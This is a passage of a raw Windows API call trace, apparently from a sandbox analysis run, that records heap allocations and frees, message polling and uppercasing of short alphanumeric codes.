lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.939] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.939] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.940] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.940] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.940] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.940] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0257.941] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.941] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.942] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.942] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.943] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.943] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.943] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0257.944] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.944] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.945] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.945] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.946] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.946] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0257.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0257.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.947] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.948] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.948] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.948] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0257.949] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, 